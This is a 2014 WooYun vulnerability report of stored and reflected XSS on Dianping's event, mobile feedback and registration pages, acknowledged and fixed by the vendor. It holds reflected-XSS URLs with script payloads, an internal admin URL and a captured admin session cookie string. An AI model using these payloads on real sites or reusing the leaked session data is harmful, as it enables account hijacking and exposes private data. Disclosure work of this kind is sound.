当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-059436

漏洞标题:大众点评多处存储型XSS漏洞(可获取cookie)

相关厂商:大众点评

漏洞作者: BlackYe.

提交时间:2014-05-05 12:54

修复时间:2014-06-19 12:55

公开时间:2014-06-19 12:55

漏洞类型:xss跨站脚本攻击

危害等级:中

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-05-05: 细节已通知厂商并且等待厂商处理中
2014-05-06: 厂商已经确认,细节仅向厂商公开
2014-05-16: 细节向核心白帽子及相关领域专家公开
2014-05-26: 细节向普通白帽子公开
2014-06-05: 细节向实习白帽子公开
2014-06-19: 细节向公众公开

简要描述:

嗷嗷嗷,在来一发~~

详细说明:

1.存储XSS(1)
http://events.dianping.com/guphoto/game.aspx#1

在造型描述中 填入xss语句, 由于前段限定了插入的长度。不过可以抓包修改在提交~~~

x1.png



然后返回,成功打到cookie.

x3.png


这里还有一个“我要拉票”,如果将该链接发给别人,或放在主站的一些热门留言区。那效果会咋样列?

x2.png


2.存储XSS(2):
在手机端反馈处,没有对提交的语句进行过滤。。
打到了后台地址,但是没有VPN无法登录,不过cookie貌似很有料哦。。 ua=打呼呼的小凤.

location : http://o.sys.www.dianping.com/opreply/reply/detailsManage.action?feedType=11&feedId=3928344
cookie : _hc.v="\"d07c5f24-3cb2-44e7-97a5-b1fbf43aeacd.1397653106\""; _dp.ac.v=26be5ae4-161b-410d-951f-89dcaf5c5325; ua=%E6%89%93%E5%91%BC%E5%91%BC%E7%9A%84%E5%B0%8F%E5%87%A4; ctu=1fcdf42401cf2a89210193af5f572a2d423f3f9f67cbd1531a93870b99139368; _tr.u=BAd9SUsrlwlp1GS5; t_refer=2000; BIGipServerWeb.Web_X_Shopoperator=2114060554.20480.0000; BIGipServerWeb.Web_X_Replyoperator=2952921354.20480.0000; BIGipServernavi-admin-web=2449998090.20480.0000; BIGipServerWeb.Admin_X_Miscoperator=2298609930.20480.0000; is=006131353643; BIGipServerWeb.Web_X_Picoperator=2248278282.20480.0000; PHOENIX_ID=0a01046f-145c5c56fbf-5d536; LeaveMeAlone=2173|4#2151|2#3001|1#2161|1; ll=7fd06e815b796be3df069dec7836c3df; ipbh=1397444753700; tc=1; s_ViewType=1; JSESSIONID=7A29D4B0AFD4407C973996A1C00CFDDA; _tr.s=TVSe7HknDUsWAbTW; t_track=D6048700:D2158246:D2158246:D311551:D311557:D6006257:D5088206:D5268986:D6006257:D5279843:D5279843:D2124818; t_rct=2124818|5279843|6006257|5268986|5088206; ab=; aburl=1; cy=18; cye=shenyang; __utma=1.1678650688.1397653105.1399175085.1399180396.15; __utmb=1.500.10.1399180396; __utmc=1; __utmz=1.1399180396.15.8.utmcsr=poibc.dp|utmccn=(referral)|utmcmd=referral|utmcct=/feedback/other; __utma=165050209.1649558767.1399172202.1399180044.1399193235.4; __utmb=165050209.63.10.1399193235; __utmc=165050209; __utmz=165050209.1399174998.2.2.utmcsr=poibc.dp|utmccn=(referral)|utmcmd=referral|utmcct=/feedback/other


x5.png


3.另外赠送几个反射XSS。
http://m.dianping.com/shop/15861337/review_tuan?page=%27/%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E

http://wap.dianping.com/reg?mobileNo=%22/%3E%3Cscript%3Ealert%28/1/%29%3C/script%3E
反射的太多了,要慢慢修啊~~~

漏洞证明:

x3.png


x2.png


修复方案:

会有礼物么?

版权声明:转载请注明来源 BlackYe.@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:7

确认时间:2014-05-06 11:55

厂商回复:

谢谢,已修复

最新状态:

暂无


漏洞评价:

评论